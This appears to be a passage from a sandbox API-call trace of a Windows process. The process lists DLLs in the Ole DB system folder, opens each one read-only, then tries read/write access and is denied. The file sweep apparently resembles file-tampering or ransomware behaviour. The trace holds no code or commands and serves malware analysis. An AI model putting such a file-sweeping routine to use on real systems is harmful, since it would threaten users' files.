1 [0088.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0088.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.950] AreFileApisANSI () returned 1 [0088.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll", lpUsedDefaultChar=0x0) returned 56 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.950] AreFileApisANSI () returned 1 [0088.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0088.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 56 [0088.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.952] GetFileType (hFile=0x360) returned 0x1 [0088.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0088.952] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.952] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.953] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.953] CloseHandle (hObject=0x360) returned 1 [0088.953] AreFileApisANSI () returned 1 [0088.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0088.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 56 [0088.953] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.953] GetLastError () returned 0x5 [0088.953] GetLastError () returned 0x5 [0088.953] SetLastError (dwErrCode=0x5) [0088.953] GetLastError () returned 0x5 [0088.954] SetLastError (dwErrCode=0x5) [0088.954] GetLastError () returned 0x5 [0088.954] SetLastError (dwErrCode=0x5) [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.954] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d0f4ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d0f4ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d0f4ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdasqlr.dll", cAlternateFileName="")) returned 1 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a828 [0088.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0088.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0088.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0088.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.955] AreFileApisANSI () returned 1 [0088.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll", lpUsedDefaultChar=0x0) returned 57 [0088.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.955] AreFileApisANSI () returned 1 [0088.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0088.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned 57 [0088.956] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.956] GetFileType (hFile=0x360) returned 0x1 [0088.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0088.956] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.956] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.956] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.957] CloseHandle (hObject=0x360) returned 1 [0088.959] AreFileApisANSI () returned 1 [0088.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0088.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned 57 [0088.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.960] GetLastError () returned 0x5 [0088.960] GetLastError () returned 0x5 [0088.960] SetLastError (dwErrCode=0x5) [0088.960] GetLastError () returned 0x5 [0088.960] SetLastError (dwErrCode=0x5) [0088.960] GetLastError () returned 0x5 [0088.960] SetLastError (dwErrCode=0x5) [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.960] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d0f4ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d0f4ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d0f4ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1ca00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdatl3.dll", cAlternateFileName="")) returned 1 [0088.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0088.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0088.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0088.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0088.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0088.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0088.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.961] AreFileApisANSI () returned 1 [0088.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll", lpUsedDefaultChar=0x0) returned 56 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.961] AreFileApisANSI () returned 1 [0088.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0088.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned 56 [0088.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.962] GetFileType (hFile=0x360) returned 0x1 [0088.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0088.962] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.962] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.962] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.962] CloseHandle (hObject=0x360) returned 1 [0088.962] AreFileApisANSI () returned 1 [0088.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0088.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned 56 [0088.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.963] GetLastError () returned 0x5 [0088.963] GetLastError () returned 0x5 [0088.963] SetLastError (dwErrCode=0x5) [0088.963] GetLastError () returned 0x5 [0088.963] SetLastError (dwErrCode=0x5) [0088.963] GetLastError () returned 0x5 [0088.963] SetLastError (dwErrCode=0x5) [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.963] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d0f4ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d0f4ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d0f4ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msxactps.dll", cAlternateFileName="")) returned 1 [0088.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0088.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0088.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0088.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0088.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0088.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.964] AreFileApisANSI () returned 1 